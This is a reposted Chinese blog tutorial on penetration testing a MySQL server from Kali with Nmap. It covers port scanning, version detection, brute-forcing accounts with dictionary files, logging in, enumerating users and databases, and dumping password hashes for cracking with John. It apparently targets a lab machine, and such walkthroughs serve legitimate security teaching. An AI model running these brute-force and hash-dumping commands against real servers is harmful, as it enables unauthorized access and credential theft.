kali中利用nmap对mysql肾透

admin 2022年8月29日10:12:31安全文章评论25 views1123字阅读3分44秒阅读模式

利用Nmap我们可以对mysql数据库进行渗透测试。通过目标的数据库名称、表、用户名,密码等核心信息进行收集,来完成肾透。本文让我们来一起学习。

🐶端口扫描

我们先利用namp对目标进行扫描,看是否开启了3306端口。

nmap -T4 -A -sT 192.168.5.38
kali中利用nmap对mysql肾透

如上图,我们可以看到目标开启了80 8080 3306等端口。而3306就是我们所需的数据库端口。

🌶️检索 MySQL 信息

通过下面命令,我们可以查看当前数据的版本、协议等相关的信息。

nmap --script=mysql-info 192.168.5.38

kali中利用nmap对mysql肾透

如上,我们发现目前正在运行的数据库版本为5.7.26

💋暴力破解账号

没错,我们的神器nmap也是具有暴力破解功能的。执行下面命令可以破解出当前数据库的账号和用户名。当然这里的破解需要的是你的运气了。

nmap -p3306 --script=mysql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.5.38

参数说明

userdb:用户名字典

passdb:密码字典

破解效果如下

kali中利用nmap对mysql肾透

得到了两个数据库的用户名和密lnds:[email protected]@  wp:[email protected]@

到这一步,我们便可以利用破解到的用户名和密码进行登录数据库。

mysql -h 192.168.5.38 -u wp -p

kali中利用nmap对mysql肾透

当然,如果你有幸破解了root账号的密码,我们可以执行下面两个好玩的命令。

🧸列举其他用户名

nmap -p3306 192.168.5.38 --script=mysql-users --script-args mysqluser=root,mysqlpass=toor

🎊列举其他数据库

nmap -p3306 192.168.5.38 --script=mysql-databases --script-args mysqluser=root,mysqlpass=toor

🇨🇳检索哈希

nmap -p3306 192.168.5.38 --script=mysql-dump-hashes --script-args username=root,password=toor

通过这条命令,我们可以列出数据库中其他用户的hash值,然后我们在利用john等破解工具进行hash的破解。从而得到其他用户的密码。

🦞总结

nmap对mysql的肾透,可见神器并非浪得虚名。但是无论哪种工具都有一定的局限性。如本文中,需要开启3306 数据库需要所有人可登录、需要强劲的密码字典。

更多精彩文章 关注我们


原文始发于微信公众号(kali黑客笔记):kali中利用nmap对mysql肾透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月29日10:12:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  kali中利用nmap对mysql肾透 http://cn-sec.com/archives/1260487.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: